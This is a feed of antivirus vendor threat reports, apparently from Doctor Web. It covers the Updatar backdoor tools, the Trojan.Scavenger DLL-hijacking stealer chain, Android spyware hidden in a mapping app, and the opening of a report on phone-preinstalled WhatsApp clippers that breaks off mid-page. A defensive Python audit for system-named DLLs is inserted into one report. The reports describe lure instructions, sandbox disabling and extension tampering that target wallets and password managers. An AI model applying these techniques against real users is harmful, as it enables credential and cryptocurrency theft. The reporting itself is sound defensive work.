&lt;p&gt;&lt;b&gt;The attackers’ tools&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;As we noted earlier, our specialists discovered several malicious fake apps during the Updatar backdoor infrastructure analysis. In addition to them, we also found the trojans &lt;b&gt;Trojan.Uploader.36875&lt;/b&gt; and &lt;b&gt;BackDoor.Siggen2.5423&lt;/b&gt;. These were not used in the attack in question but could be involved in other Scaly Wolf campaigns.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Trojan.Uploader.36875&lt;/b&gt; is designed to send files from the infected computers to the attackers’ server. And &lt;b&gt;BackDoor.Siggen2.5423&lt;/b&gt; allows computers to be controlled remotely via VNC. In turn, the fake apps display windows with different messages that mislead potential victims. These fakes do not pose a direct threat to computers but can help malicious actors carry out attacks. Below are examples of the fake windows they display.&lt;/p&gt;

&lt;p&gt;A fake message about removing the security software:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/warning_message.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/warning_message.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;A fake window from the built-in Windows anti-virus about a scan that ended with threats being deleted:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/info_message.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/info_message.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;A fake message stating that some system settings must be applied “to keep Windows stable”:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/error_message.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/error_message.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In reality, each fake receives a command as an argument, and when the user clicks the confirmation button in the message window, it launches the target app.&lt;/p&gt;

&lt;p&gt;The list of tools and malware used by the Scaly Wolf group:&lt;/p&gt;

&lt;p&gt;
    &lt;b&gt;Trojan.Updatar.1&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Trojan.Updatar.2&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Trojan.Updatar.3&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Trojan.Uploader.36875&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;BackDoor.Siggen2.5423&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;BackDoor.Shell.244 (Meterpreter)&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;BackDoor.Meterpreter.259&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Program.RemoteAdmin.877 (RemCos)&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Tool.HandleKatz&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Tool.Chisel&lt;/b&gt;
    &lt;br&gt;
    &lt;b&gt;Tool.Frp&lt;/b&gt;
&lt;/p&gt;

&lt;p&gt;For detailed technical descriptions of the Updatar backdoor and its components, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;

&lt;p&gt;
    More about &lt;a href="https://vms.drweb.com/virus/?i=30429955&amp;1lng=en" target="_blank"&gt;&lt;b&gt;Trojan.Updatar.1&lt;/b&gt;&lt;/a&gt;
    &lt;br&gt;
    More about &lt;a href="https://vms.drweb.com/virus/?i=30429956&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.Updatar.2&lt;/b&gt;&lt;/a&gt;
    &lt;br&gt;
    More about &lt;a href="https://vms.drweb.com/virus/?i=30429946&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.Updatar.3&lt;/b&gt;&lt;/a&gt;
    &lt;br&gt;
    More about &lt;a href="https://vms.drweb.com/virus/?i=30429948&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.Uploader.36875&lt;/b&gt;&lt;/a&gt;
    &lt;br&gt;
    More about &lt;a href="https://vms.drweb.com/virus/?i=30429947&amp;lng=en" target="_blank"&gt;&lt;b&gt;BackDoor.Siggen2.5423&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;h3&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;Targeted attacks remain a serious information security threat for companies. The case we analyzed showed that threat actors are flexible and inventive in their attempts to gain access to information systems. Hackers can use different entry vectors: phishing mailings, exploitable vulnerabilities, computers lacking anti-virus protection, and even software that anti-viruses allow to run by default, like remote administration tools.&lt;/p&gt;

&lt;p&gt;Therefore, even when corporate computers have security solutions installed on them, attackers can try to bypass them. For more robust protection, we recommend thoroughly configuring the anti-virus on corporate machines and not keeping the default settings. Additionally, all available operating system and software updates should be installed to reduce the risk of infection via exploitable vulnerabilities.&lt;/p&gt;

&lt;h3&gt;MITRE matrix&lt;/h3&gt;

&lt;div class="table-news"&gt;
 &lt;table&gt;
   &lt;tr&gt;
     &lt;td class="first"&gt;Stage&lt;/td&gt;
     &lt;td&gt;Technique&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Initial access&lt;/td&gt;
     &lt;td&gt;Phishing (T1566)&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Execution&lt;/td&gt;
     &lt;td&gt;User execution (T1204)&lt;br /&gt;&lt;br /&gt;Software Deployment Tools (T1072)&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Persistence&lt;/td&gt;
     &lt;td&gt;BITS Jobs (T1197)&lt;br /&gt;&lt;br /&gt;Modify Registry (T1112)&lt;br /&gt;&lt;br /&gt;Boot or Logon Autostart Execution (T1547)&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Detection prevention&lt;/td&gt;
     &lt;td&gt;Obfuscated Files or Information (T1027)&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Data collection&lt;/td&gt;
     &lt;td&gt;Data from Local System (T1005)&lt;br /&gt;&lt;br /&gt;Screen Capture (T1113)&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;Command and control&lt;/td&gt;
     &lt;td&gt;Web Protocols (T1437.001)&lt;br /&gt;&lt;br /&gt;Encrypted Channel (T1573)&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/APT_Trojan.Updatar/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15036&amp;lng=en</guid><title>Gamers, get ready: scammers disguise cryptocurrency and password-stealing  Scavenger trojans as cheats and mods</title><link>https://news.drweb.com/show/?i=15036&amp;lng=en&amp;c=23</link><pubDate>Thu, 24 Jul 2025 16:26:45 GMT</pubDate><description>&lt;div class="vir_rev_btn center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/scavenger/Gamers_get_ready.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;July 24, 2025&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web’s virus laboratory has detected Trojan.Scavenger—a family of malicious apps that threat actors use to steal confidential data from crypto wallets and password managers from Windows users. Threat actors chain together several trojans from this family, exploiting DLL Search Order Hijacking vulnerabilities to execute their payloads and exfiltrate data.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;Introduction&lt;/h3&gt;

&lt;p&gt;In 2024, the company Doctor Web &lt;a href="https://news.drweb.com/show/?i=14899&amp;lng=en" target="_blank"&gt;investigated an information security incident&lt;/a&gt; involving an attempt to carry out a targeted attack on a Russian enterprise. The attack’s scheme included using malware that exploited the DLL Search Order Hijacking vulnerability in a popular web browser. When Windows applications launch, they search—in different locations and in a certain sequence—for all the libraries they need to operate properly. To “trick” the apps, attackers place malicious DLL files where they will be searched for first, such as in the installation directory of the target software. At the same time, the threat actors give their trojan files the names of legitimate libraries located in directories that have a lower search priority. As a result, when launched, vulnerable apps load the malicious DLL files first. These trojan libraries operate as part of the apps and get the same permissions.&lt;/p&gt;

&lt;p&gt;Following the incident in question, our specialists implemented functionality in Dr.Web anti-virus products that makes it possible to track and prevent attempts to exploit DLL Search Order Hijacking vulnerabilities. While analyzing the telemetry data of this feature, Doctor Web’s virus analysts detected attempts to load previously unknown malware into several of our clients’ browsers. Our investigation into these cases allowed us to uncover a new hacker campaign, which is the subject of this article.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt; malicious programs infect computers in several stages; an infection starts with downloader trojans getting into the target systems in various ways. Our specialists detected two infection chains in this campaign, involving different numbers of trojan components.&lt;/p&gt;

&lt;h3&gt;Chain of three loaders&lt;/h3&gt;

&lt;p&gt;In this chain, the starting component is &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt;, malware that is a dynamic-link library (a DLL file). It can be distributed via torrents and game-related sites either as part of pirated games or under the guise of different patches, cheats, and mods. Next, we will look at an example where scammers passed off the trojan as a patch.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Trojan.Scavenger.1&lt;/b&gt; is distributed in a ZIP archive along with installation instructions in which fraudsters encourage their potential victim to place the “patch” into the Oblivion Remastered game directory—allegedly to improve its performance:&lt;/p&gt;

&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p style="margin-top: 20px;"&gt;The name of the malicious file was chosen by the attackers deliberately, as a legitimate file with the name &lt;span class="string"&gt;umpdc.dll&lt;/span&gt; is located in the Windows system directory &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;. It is part of a graphic API used by various programs, including games. If the victim’s version of the game has an unpatched vulnerability, the copied trojan file will automatically be launched along with it. It is worth noting that the version of the Oblivion Remastered game, relevant at the time of the study, was correctly handling the library search order for the file &lt;span class="string"&gt;umpdc.dll&lt;/span&gt;; for this reason, in the example in question, &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt; could not automatically start with the game and continue the infection chain.&lt;/p&gt;

&lt;p&gt;When successfully launched, the trojan downloads from a remote server and launches the next stage, which is the malicious downloader &lt;b&gt;Trojan.Scavenger.2&lt;/b&gt; (&lt;span class="string"&gt;tmp6FC15.dll&lt;/span&gt;). In turn, this trojan downloads and installs other modules from this family into the system—&lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; and &lt;b&gt;Trojan.Scavenger.4&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; is a dynamic library &lt;span class="string"&gt;version.dll&lt;/span&gt; that is copied into the directory of one of the target browsers based on the Chromium engine. This file has the same name as one of the system libraries from the directory &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;. Browsers vulnerable to DLL Search Order Hijacking do not check where a library with that name is loaded from, and since the trojan file is located in their installation directory, it takes priority over the legitimate system library and is loaded first. Our virus analysts detected attempts to exploit this vulnerability in the browsers Google Chrome, Microsoft Edge, Yandex Browser, and Opera.&lt;/p&gt;
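&lt;p&gt;The loading-order behaviour described in the Introduction and in the paragraph above, as an added example that is not part of the original article or of Doctor Web’s tooling: a small Python audit that lists DLLs in an application directory whose names collide with System32 library names. The name set holds the three libraries this article names (umpdc.dll, version.dll, profapi.dll) plus two constructed entries, and the directory listings are constructed for the example; a real audit would enumerate %WINDIR%\System32 and walk the actual install folders.&lt;/p&gt;

```python
import os

# Library names that live in %WINDIR%\System32. The three named in the article
# (umpdc.dll, version.dll, profapi.dll) plus two constructed entries; a real audit
# would enumerate the System32 directory instead of using this short set.
SYSTEM32_DLLS = {"umpdc.dll", "version.dll", "profapi.dll", "kernel32.dll", "ntdll.dll"}

# Constructed directory listings standing in for application install folders.
# Paths and file names are illustrative, not taken from a real machine.
SAMPLE_LISTINGS = {
    r"C:\Games\Oblivion Remastered\OblivionRemastered\Binaries\Win64":
        ["OblivionRemastered-Win64-Shipping.exe", "umpdc.dll", "engine.ini"],
    r"C:\Program Files\Google\Chrome\Application":
        ["chrome.exe", "chrome.dll", "version.dll"],
    r"C:\Users\user\AppData\Local\exodus\app-1.0.0":
        ["Exodus.exe", "profapi.dll"],
    r"C:\Program Files\Clean\App":
        ["app.exe", "helper.dll"],
}


def find_shadowed_dlls(app_dir_files, system_dlls=SYSTEM32_DLLS):
    """Return, sorted, the file names in one application directory listing that
    collide with a System32 library name. An application that asks for such a
    library by bare name may resolve it to this local copy before System32."""
    return sorted(
        name for name in app_dir_files
        if name.lower().endswith(".dll") and name.lower() in system_dlls
    )


def audit(listings, system_dlls=SYSTEM32_DLLS):
    """Map each directory to its colliding DLL names, omitting clean directories."""
    report = {}
    for directory, files in listings.items():
        shadowed = find_shadowed_dlls(files, system_dlls)
        if shadowed:
            report[directory] = shadowed
    return report


def audit_directory(path, system_dlls=SYSTEM32_DLLS):
    """The same check against a real directory on disk (non-recursive)."""
    return find_shadowed_dlls(os.listdir(path), system_dlls)


if __name__ == "__main__":
    for directory, shadowed in audit(SAMPLE_LISTINGS).items():
        print(directory, ":", ", ".join(shadowed))
```

&lt;p&gt;A hit is a lead, not a verdict: some applications legitimately ship private copies of system-named libraries, so each flagged file should be checked for a valid Authenticode signature and compared by hash with the copy in System32. Names listed in the KnownDLLs registry key are resolved from System32 regardless of the search order and can be dropped from the set to reduce noise.&lt;/p&gt;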

&lt;p&gt;When launched, &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; disables the target browser’s protective mechanisms, such as the mechanism that launches its sandbox, causing the JavaScript code to be executed in the primary memory space. Moreover, the trojan disables the verification of browser extensions. To do so, it determines where the corresponding Chromium library is by the presence of the export function &lt;span class="string"&gt;CrashForExceptionInNonABICompliantCodeRange&lt;/span&gt; in it. Next, it searches for the extension verification procedure in this library and patches it.&lt;/p&gt;

&lt;p&gt;After that, the trojan modifies the target extensions installed in the browser, receiving necessary modifications in the form of JavaScript code from the C2 server. The following extensions are being modified:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;
        crypto wallets
        &lt;ul&gt;
            &lt;li&gt;Phantom&lt;/li&gt;
            &lt;li&gt;Slush&lt;/li&gt;
            &lt;li&gt;MetaMask&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
    &lt;li&gt;
        password managers
        &lt;ul&gt;
            &lt;li&gt;Bitwarden&lt;/li&gt;
            &lt;li&gt;LastPass&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In this case, it is not the originals that are modified, but the copies that the trojan placed in the directory &lt;span class="string"&gt;%TEMP%/ServiceWorkerCache&lt;/span&gt; in advance. And to make the browser “pick up” the modified extensions, &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; hooks the functions &lt;span class="string"&gt;CreateFileW&lt;/span&gt; and &lt;span class="string"&gt;GetFileAttributesExW&lt;/span&gt; by substituting the local paths to the original files with paths to the modifications (Dr.Web detects the latter as &lt;b&gt;Trojan.Scavenger.5&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;The modifications themselves are presented in two variants: &lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;a time stamp is added to the Cookie;&lt;/li&gt;
    &lt;li&gt;a routine for sending user data to the C2 server is added.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The attackers obtain mnemonic phrases from Phantom, Slush, and MetaMask crypto wallets. They also receive the authorization Cookie and user-added passwords from the password managers Bitwarden and LastPass, respectively.&lt;/p&gt;

&lt;p&gt;In turn, &lt;b&gt;Trojan.Scavenger.4&lt;/b&gt; (&lt;span class="string"&gt;profapi.dll&lt;/span&gt;) is copied to the directory containing the installed Exodus crypto wallet. The trojan is launched automatically with this app, also by exploiting the DLL Search Order Hijacking vulnerability in it (the legitimate system library &lt;span class="string"&gt;profapi.dll&lt;/span&gt; is located in the directory &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;, but due to the vulnerability, the loading priority is given to the trojan file when the wallet is launched).&lt;/p&gt;

&lt;p&gt;After it starts up, &lt;b&gt;Trojan.Scavenger.4&lt;/b&gt; hooks the function &lt;span class="string"&gt;v8::String::NewFromUtf8&lt;/span&gt; from the V8 engine responsible for working with JavaScript and WebAssembly. With its help, the malicious app can obtain various user data. In the case of the Exodus program, the trojan searches for the JSON that has the key &lt;span class="string"&gt;passphrase&lt;/span&gt; and reads its value. As a result, it gets the user’s mnemonic phrase that can be used to decrypt or generate a new private key for the victim’s crypto wallet. Next, the trojan locates the private key file &lt;span class="string"&gt;seed.seco&lt;/span&gt; from the crypto wallet, reads it, and sends it to the C2 server together with the mnemonic phrase it obtained earlier.&lt;/p&gt;

&lt;h3&gt;Chain of two loaders&lt;/h3&gt;
&lt;p&gt;In general, this chain is identical to the first one. However, instead of &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt;, the distributed archives with the “patches” and “cheats” for games contain a modified version of &lt;b&gt;Trojan.Scavenger.2&lt;/b&gt;. It is presented not as a DLL file but as a file with the extension &lt;span class="string"&gt;.ASI&lt;/span&gt; (this is actually a dynamic library with a changed extension).&lt;/p&gt;

&lt;p&gt;The archive also comes with installation instructions:&lt;/p&gt;

&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;After the user copies the file to the specified directory, it will run automatically whenever the target game is launched, since the game treats it as one of its own plugins. From this point on, the infection chain repeats the steps from the first variant.&lt;/p&gt;

&lt;h3&gt;The family’s common features&lt;/h3&gt;

&lt;p&gt;Most of this family’s trojans have a number of common features. One of them is the standard procedure for verifying the running environment to detect a virtual machine or debug mode. If trojans detect signs that they are being launched in a virtual environment, they stop working.&lt;/p&gt;

&lt;p&gt;Another common attribute of the family is the general algorithm for communicating with the C2 server. To connect to it, trojans go through the procedure of creating an encryption key and verifying the encryption. This involves sending two requests. The first one is needed to receive part of the key that is used for encrypting some parameters and data in certain requests. The second request is executed to check the key and contains some parameters, including a randomly generated string, the current time, and the encrypted time value. The C2 server responds to this request with the string it received earlier. All consecutive requests have time parameters, and if they are missing, the server will refuse to establish the connection.&lt;/p&gt;

&lt;p&gt;For detailed technical descriptions of the malicious programs detected, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;

&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger.1&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger.2&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger.2&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger.3&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger.4&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger.4&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger.5&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;We notified the developers whose software was exploited via the security flaws we detected, but they deemed the DLL Search Order Hijacking vulnerabilities as not requiring a fix. However, the protection against this type of attack that we added to our Dr.Web anti-virus products successfully counteracted the exploitation of vulnerabilities in the affected browsers even before we learned about the &lt;b&gt;Trojan.Scavenger&lt;/b&gt; malware family. Because of that, these trojans did not pose a threat to our users. And as part of this study, we also added the corresponding protection for the Exodus crypto wallet app.&lt;/p&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Scavenger" target="_blank"&gt;Indicators of compromise&lt;/a&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=15006&amp;lng=en</guid><title>Android spyware trojan targets Russian military personnel who use Alpine Quest mapping software</title><link>https://news.drweb.com/show/?i=15006&amp;lng=en&amp;c=23</link><pubDate>Mon, 21 Apr 2025 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;April 21, 2025&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web’s experts have discovered Android.Spy.1292.origin, spyware whose main target is Russian military personnel. The attackers hide this trojan inside modified Alpine Quest mapping software and distribute it in various ways, including through one of the Russian Android app catalogs. Among other things, the malware sends the attackers phonebook contact information and the infected device’s geolocation. Moreover, this spyware collects data about the files stored on the devices and, when commanded by threat actors, can download additional modules possessing the functionality needed to steal the files.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Alpine Quest is topographic software that allows different maps to be used in both online and offline mode. It is popular among athletes, travelers, and hunters, but it is also widely used by Russian military personnel in the Special Military Operation zone, and this is what the campaign organizers decided to exploit. Threat actors embedded &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; into one of the older Alpine Quest app versions and distributed the trojanized variant under the guise of a freely available version of Alpine Quest Pro, a program with advanced functionality. They created a fake Telegram channel for the software; the channel provided a link for downloading the app from one of the Russian app catalogs. The same trojan version, disguised as an “update” for the app, was later distributed via this very same channel.&lt;/p&gt;
&lt;p class="noMargB alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/vir-news/Android.Spy.1292.origin_telegram_group.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/vir-news/Android.Spy.1292.origin_telegram_group.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The Telegram channel through which threat actors distributed the &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; trojan&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Because &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; is embedded into a copy of the genuine app, it looks and operates as the original, which allows it to stay undetected and execute malicious tasks for longer periods of time.&lt;/p&gt;
&lt;p&gt;Each time it is launched, the trojan collects and sends the following data to the C&amp;C server:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the user’s mobile phone number and their accounts;&lt;/li&gt;
&lt;li&gt;contacts from the phonebook;&lt;/li&gt;
&lt;li&gt;the current date;&lt;/li&gt;
&lt;li&gt;the current geolocation;&lt;/li&gt;
&lt;li&gt;information about the files stored on the device;&lt;/li&gt;
&lt;li&gt;the app’s version.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the same time, it sends some of this information to the attackers’ Telegram bot as well. For instance, the trojan sends the bot the geolocation data every time the device’s location changes.&lt;/p&gt;
&lt;p&gt;After receiving information about the available files, threat actors can command the trojan to download and run additional modules used to steal the files of interest. The analysis performed by our specialists indicates that the creators of the trojan are particularly interested in confidential documents that users sent via the Telegram and WhatsApp messengers, as well as the &lt;span class="string"&gt;locLog&lt;/span&gt; location log file created directly by the Alpine Quest program.&lt;/p&gt;
&lt;p&gt;As a result, &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; not only allows user locations to be monitored but also confidential files to be exfiltrated. In addition, its functionality can be expanded via the download of new modules, which allows it to execute a wider spectrum of malicious tasks.&lt;/p&gt;
&lt;p&gt;Doctor Web’s specialists recommend installing Android programs only from reputable sources, such as official app catalogs, and opting against downloading software from Telegram channels and dubious websites, especially when it comes to supposedly freely available paid versions of programs. At the same time, it is important to pay attention to who is distributing the apps of interest, as attackers often disguise themselves as real developers, using similar names and logos.&lt;/p&gt;
&lt;p&gt;To protect Android devices, it is essential to use an anti-virus. Dr.Web Security Space for mobile devices reliably detects and deletes the &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; trojan, keeping our users well protected from this threat.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Spy.1292.origin/README.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=15002&amp;lng=en</guid><title>Nice chatting with you: what connects cheap Android smartphones, WhatsApp and cryptocurrency theft?</title><link>https://news.drweb.com/show/?i=15002&amp;lng=en&amp;c=23</link><pubDate>Mon, 14 Apr 2025 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;April 14, 2025&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Every year, cryptocurrencies become more and more common as a payment method. According to the data for 2023, in developed countries about 20% of the population has at some time used such a means of payment, and in developing countries, where the banking sector does not meet the needs of the population, the number of cryptocurrency users is even higher. In cryptocurrency adoption rankings, Russia is among the top ten countries in terms of number of users. Anonymity, fast transactions, global accessibility and low transfer fees are the main advantages that attract ordinary users. Fraudsters, on the other hand, appreciate the irreversibility of the transactions, the lack of regulation, and the lack of user knowledge due to the relative novelty of the technology, which allows them to implement a variety of illicit enrichment schemes.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Starting from June 2024, the Doctor Web virus laboratory has received a number of reports from our customers who installed Dr.Web Security Space antivirus on their newly purchased Android phones. A scan of the system partition revealed a suspicious application disguised as WhatsApp messenger. During their investigation, our analysts were able to establish that those cases were not a mere blip on the radar. It turned out that they were all part of a campaign to steal cryptocurrency through clipping.&lt;/p&gt;

&lt;blockquote&gt;Clipping means stealing information by intercepting and/or spoofing data that a user copies to the clipboard. Most commonly, clippers are designed to search the clipboard for strings corresponding to cryptocurrency wallet addresses. On average, such strings contain between 25 and 42 characters. Since strings of that length are impractical to type by hand, users typically work with them via the standard "copy" and "paste" operations. A clipper takes advantage of this by intercepting the contents of the clipboard and discreetly replacing every cryptocurrency wallet address with one belonging to the cybercriminals.&lt;/blockquote&gt;

&lt;p&gt;Using messengers trojanized by clippers to steal financial information is not a new tactic for hackers: one such campaign began in 2023. At that time, a group of attackers used a number of legitimate platforms, such as YouTube, to distribute links to malicious Telegram and WhatsApp apps. These links were placed in the video descriptions. The main target audience was Chinese users, who do not have access to foreign messengers. And since they have to use a number of tricks to get around the geoblocking, usually by downloading programs from third-party sites, this campaign was quite successful.&lt;/p&gt;

&lt;p&gt;Now the attackers have moved to the next level, gaining access to the supply chain of a number of Chinese manufacturers of Android-based smartphones. These are the smartphones that were reported to Doctor Web's virus lab. The fraudulent applications were found directly in the software pre-installed on the phones. In this case, the malicious code was added to the WhatsApp messenger.&lt;/p&gt;

&lt;p&gt;It should be noted that in most cases the compromised devices were low-end and had names similar to the models of well-known brands: S23 Ultra, Note 13 Pro, P70 Ultra, and so on. At the same time, their actual technical specifications were far from what their product pages claimed. The threat actors used an application that allowed them to easily spoof all of the technical information displayed not only on the About Device page but also in the reports of such popular applications as AIDA64 and CPU-Z. In addition, although the About Device page claimed that the phones had the latest version of Android 14 installed, all of the devices were actually running the same build of Android 12. A third of the models listed below are manufactured under the SHOWJI brand. Unfortunately, we were unable to identify the manufacturer of the remaining models.&lt;/p&gt;

&lt;div class="ScrollX"&gt;
  &lt;table class="Table"&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI S19 Pro&lt;/td&gt;
      &lt;td&gt;Note 30i&lt;/td&gt;
      &lt;td&gt;Camon 20&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI Note 13 Pro&lt;/td&gt;
      &lt;td&gt;S23 Ultra&lt;/td&gt;
      &lt;td&gt;P70 Ultra&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI X100S Pro&lt;/td&gt;
      &lt;td&gt;S18 Pro&lt;/td&gt;
      &lt;td&gt;M14 Ultra&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI Reno12 Pro&lt;/td&gt;
      &lt;td&gt;6 Pro&lt;/td&gt;
      &lt;td&gt;S24 Ultra&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Smartphone models purchased by our users that came with preinstalled malicious software&lt;/em&gt;&lt;/p&gt;

&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic1.png" class="preview"&gt;
       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic1.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic2.png" class="preview"&gt;
